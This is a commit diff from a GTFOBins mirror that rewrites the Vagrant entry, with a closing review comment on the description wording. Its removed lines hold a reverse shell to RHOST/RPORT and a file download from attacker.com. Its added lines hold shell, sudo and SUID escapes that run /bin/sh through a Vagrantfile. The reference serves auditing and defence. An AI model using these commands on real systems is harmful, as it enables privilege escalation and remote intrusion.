mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Simplify vagrant
parent
e05b154647
commit
f121dff1cc
@ -1,30 +1,20 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
|
||||||
Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
|
|
||||||
More Info at https://gtfobins.github.io/gtfobins/ruby/
|
|
||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
|
- code: |
|
||||||
-
|
cd $(mktemp -d)
|
||||||
|
echo 'exec "/bin/sh"' > Vagrantfile
|
||||||
|
vagrant up
|
||||||
sudo:
|
sudo:
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
|
- code: |
|
||||||
reverse-shell:
|
cd $(mktemp -d)
|
||||||
- description: |
|
echo 'exec "/bin/sh"' > Vagrantfile
|
||||||
Run `nc -lvnp RPORT` on the attacker box.
|
vagrant up
|
||||||
Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
|
suid:
|
||||||
code: |
|
- code: |
|
||||||
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
|
cd $(mktemp -d)
|
||||||
file-write:
|
echo 'exec "/bin/sh -p"' > Vagrantfile
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
|
vagrant up
|
||||||
file-read:
|
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
|
|
||||||
library-load:
|
|
||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
|
||||||
file-download:
|
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
|
||||||
code: |
|
|
||||||
export URL=http://attacker.com/file_to_get
|
|
||||||
export LFILE=file_to_save
|
|
||||||
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
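Review bot: The new one-line `description:` drops the old text's statement that Vagrant executes Ruby code from the Vagrantfile when it starts. A reader auditing a sudo rule or a SUID bit on vagrant needs that fact to understand why the `shell`, `sudo` and `suid` entries work. I would keep it in one sentence and fix the grammar of "This allows to execute", for example `description: Vagrant evaluates the Vagrantfile as Ruby code when it starts, so it can run ruby code (see /gtfobins/ruby/); other functions may apply.` The rendering has lost the +/- markers, so which lines are old and which are new is inferred here from the two-column layout.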